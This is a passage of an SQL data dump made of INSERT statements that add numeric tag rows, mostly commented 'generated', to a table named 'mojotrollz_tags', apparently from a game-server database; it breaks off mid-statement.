INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182077, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182078, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182080, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182081, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182096, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182097, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182098, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182106, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182483, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184006, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184164, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184530, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184531, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184532, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184616, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184617, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (184618, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (185321, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (185433, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (185493, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (185498, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (185580, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186218, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186230, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186231, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186232, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186233, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186240, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186243, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186264, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186266, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186269, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186269, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186272, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186273, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186283, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186287, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186314, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186314, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186322, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186327, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186327, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186328, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186328, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186330, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186419, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186420, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186426, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186450, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186451, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186463, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186465, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186469, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186629, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186630, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186631, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186720, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186896, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186897, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186898, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186899, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186900, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186901, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186902, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186903, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186904, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187252, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187254, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187260, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187273, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187559, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187564, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187576, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187653, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187667, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187708, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187914, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187916, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187918, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187920, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187923, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187924, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187925, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187926, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187927, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187928, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187931, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187932, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187934, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187936, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187938, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187940, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187943, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187944, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187945, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187946, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187947, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187948, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187950, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187951, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187952, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187953, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187954, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187956, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187957, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187959, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187961, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187964, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187968, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187971, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187972, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187973, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187988, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187989, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (188123, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (188174, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (190483, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (190484, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (200000, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (200000, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (200000, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (200000, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300011, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300011, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300012, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300013, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300016, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300017, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300018, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300019, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300019, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300020, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300021, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300022, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300023, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300025, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300026, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300027, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300031, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300034, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300036, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300037, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300048, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300049, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300050, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300050, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300050, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300050, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300051, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300051, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300051, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300051, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300053, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300054, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300055, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300057, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300059, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300060, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300060, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300060, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300060, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300061, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300062, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300063, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300064, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300065, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300078, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300119, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300131, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300132, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300133, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300134, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300135, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300136, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300137, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300138, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300139, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300140, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300141, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300142, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300143, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300144, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300145, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300146, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300147, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300148, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300149, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300150, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300151, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300153, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (159, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (200, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (201, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (202, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (203, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (236, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (237, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (238, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (239, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (285, 3, 20, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (285, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (286, 3, 20, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (286, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (287, 3, 20, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (287, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (718, 3, 20, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (718, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (792, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (793, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (794, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (795, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (796, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (797, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (798, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (799, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (837, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (838, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (839, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (840, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (847, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (848, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (849, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (850, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (851, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (852, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (853, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (854, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (922, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (923, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (924, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (925, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (927, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (928, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1179, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1194, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1196, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1197, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1198, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1205, 